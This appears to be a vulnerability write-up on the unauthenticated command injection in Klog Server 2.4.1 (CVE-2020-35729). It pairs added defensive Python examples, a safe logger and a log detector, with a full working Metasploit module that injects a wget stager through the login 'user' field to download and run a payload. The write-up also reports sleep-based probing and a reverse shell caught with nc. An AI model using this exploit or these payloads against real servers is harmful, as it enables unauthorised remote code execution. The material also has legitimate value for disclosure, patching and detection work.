KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
As you can see in the code line above, the user input received by the login panel is executed on the server without any filtering. The purpose of this code line is to record the username of a failed login through the 'log.sh' script found in the path /klog/www/config/scripts/. The log.sh source code is shown below.
Here the 'logmsg' variable holds the user-supplied value, and, as the code shows, it is written to the /var/log/klog/127.0.0.1/kaudit.log file. Because the value is passed to the shell unescaped, this is what causes the command injection vulnerability.
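The page describes the failed-login username travelling through shell_exec() into log.sh and from there into kaudit.log. The following is an added example, not Klog Server's code, showing two ways to record that value without ever handing it to a shell: append the record directly from the application, or, if the helper script must stay, pass the username as a single argv element so no shell parses it. The script path, log path, field names and the sample payload are assumptions modelled on the page's description.

```python
"""Added example (not Klog Server's code): recording a failed-login username
as inert data instead of interpolating it into a shell command line."""
import os
import re
import tempfile
from datetime import datetime, timezone

# Constructed payload in the shape the page describes (URL-decoded form of
# unsafe+%22%26sleep+5%26%22). It is harmless as data and dangerous only when
# a shell is allowed to parse it.
INJECTION_PAYLOAD = 'unsafe "& sleep 5 &"'

# Assumed paths, modelled on the ones named on the page.
DEFAULT_AUDIT_LOG = "/var/log/klog/127.0.0.1/kaudit.log"
LOG_SCRIPT = "/klog/www/config/scripts/log.sh"
MAX_USER_LEN = 128

# Control characters would let a logged value forge extra log records.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_username(user: str) -> str:
    """Strip control characters (log forging) and cap the length; nothing else
    needs escaping because the value is never parsed by a shell."""
    return _CONTROL_CHARS.sub("", user)[:MAX_USER_LEN]


def build_log_argv(user: str, script: str = LOG_SCRIPT) -> list:
    """If log.sh has to remain, invoke it with an argv list (subprocess.run
    without shell=True). The username is ONE element, so '&', ';' and quotes
    are never interpreted as syntax."""
    return ["/bin/sh", script, sanitize_username(user)]


def log_failed_login(user: str, client_ip: str, log_path: str = DEFAULT_AUDIT_LOG) -> str:
    """Preferred fix: append the record from the application itself, with no
    subprocess at all. Returns the line that was written."""
    ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    line = f"{ts} login_failed ip={client_ip} user={sanitize_username(user)}\n"
    os.makedirs(os.path.dirname(log_path), exist_ok=True)
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line


def demo() -> str:
    """Run the hardened logger against the constructed payload in a temporary
    directory and return the stored log contents."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "kaudit.log")
        log_failed_login(INJECTION_PAYLOAD, "127.0.0.1", path)
        with open(path, encoding="utf-8") as fh:
            return fh.read()


if __name__ == "__main__":
    print(demo(), end="")
    print(build_log_argv(INJECTION_PAYLOAD))
```

Either variant keeps the payload as a literal string in the audit log. The argv form is the minimal change when the shell script cannot be removed; the direct-append form removes the shell from the path entirely, which is the fix a reviewer would ask for.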

VULNERABILITY DETECTION AND EXPLOITATION

In the first step, the payload “%26sleep+5%26” was sent and was executed on the target Klog Server. This is shown in the Burp Suite screenshot below.
Then, to automate the reverse shell connection to the server, the exploit shown in the screenshot below was run, and a shell was successfully obtained in the listening nc connection.
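Both payloads on this page (“%26sleep+5%26” and the module's check string “unsafe+%22%26sleep+40%26%22”) share one property: once URL-decoded, the 'user' field of a POST to /actions/authenticate.php contains shell metacharacters. The following is an added detection example, not code from the page or from the vendor. It assumes a reverse proxy or WAF log that records the POST body; the log format and the sample lines are constructed, and the two attack bodies are the page's own payloads.

```python
"""Added example (not from the page or vendor): flag login requests whose
'user' field carries shell metacharacters."""
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/actions/authenticate.php"  # endpoint named in the page's module

# Shell metacharacters that have no place in a username. A newline is included
# because the page's module rewrites ';' into %0A to chain commands.
SHELL_META = re.compile(r"[&|;`\n$<>]")

# Constructed log format: client_ip method path "body"
LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<body>[^"]*)"$')

# Constructed sample lines; the two attack bodies are the page's payloads.
SAMPLE_LOG = """\
10.0.0.5 POST /actions/authenticate.php "user=admin&pswd=Winter2021"
10.0.0.6 POST /actions/authenticate.php "user=j.doe%40example.com&pswd=x"
10.0.0.9 POST /actions/authenticate.php "user=%26sleep+5%26&pswd=x"
10.0.0.9 POST /actions/authenticate.php "user=unsafe+%22%26sleep+40%26%22&pswd=inline"
10.0.0.7 GET /index.php ""
"""


def parse_line(line: str):
    """Split one constructed log line into fields and URL-decode the body.
    parse_qs splits on the literal '&' first, so an encoded %26 inside a value
    survives as part of that value (which is exactly what we want to inspect)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    params = parse_qs(rec["body"], keep_blank_values=True)
    rec["params"] = {k: v[0] for k, v in params.items()}
    return rec


def find_injection_attempts(log_text: str) -> list:
    """Return one finding per login POST whose decoded 'user' value contains
    shell metacharacters. Each finding carries the client IP, the decoded
    value and the metacharacters seen."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if not rec["path"].endswith(LOGIN_PATH):
            continue
        user = rec["params"].get("user", "")
        meta = sorted(set(SHELL_META.findall(user)))
        if meta:
            hits.append({"ip": rec["ip"], "user": user, "meta": meta})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} user={hit['user']!r} meta={hit['meta']}")
```

Decoding before matching matters: the raw body never contains a literal '&' inside the value, so a rule that looks at the undecoded request misses both payloads. The same decoded-field check can be applied to the username recorded in kaudit.log itself, which is where the page shows the value ending up.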
Klog Server 2.4.1 - Command Injection (Unauthenticated) (Exploit Database)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
        "user" parameter is executed via shell_exec() function without input validation.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'B3KC4T', # Vulnerability discovery
          'Metin Yunus Kandemir', # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2020-35729'],
          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
        ],
      'DefaultOptions' =>
        {
          'HttpClientTimeout' => 2,
        },
      'Platform' => [ 'unix', 'linux' ],
      'Arch' => [ ARCH_X64 ],
      'Targets' => [
        ['Klog Server 2.4.1 (x64)', {
          'Platform' => 'linux',
          'Arch' => ARCH_X64,
        }],
      ],
      'Privileged' => false,
      'DisclosureDate' => "2021-01-05",
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
      ]
    )
  end

  # Rewrite the stager command so it survives the request encoding that
  # 'encode_params' => false leaves to us: ';' becomes an encoded newline,
  # spaces become '+', and '/' is percent-encoded.
  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    cmd # gsub! returns nil when nothing matched, so return the string explicitly
  end

  def execute_command(cmd, opts = {})
    command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"

    print_status("Sending stager payload...")
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false,
      'vars_post' => {
        'user' => command_payload,
        'pswd' => "inline"
      }
    })
    # A 302 means the login handler completed normally; anything else
    # (including a timeout) is taken as the injected command having run.
    if res && res.code == 302
      print_error("The target is not vulnerable!")
    else
      print_good("The target is vulnerable!")
    end
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false,
      'vars_post' => {
        'user' => "unsafe+%22%26sleep+40%26%22", # checking blind command injection via sleep
        'pswd' => "inline"
      }
    })
    if res && res.code == 302
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 10)
  end
end
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit) (Exploit Database)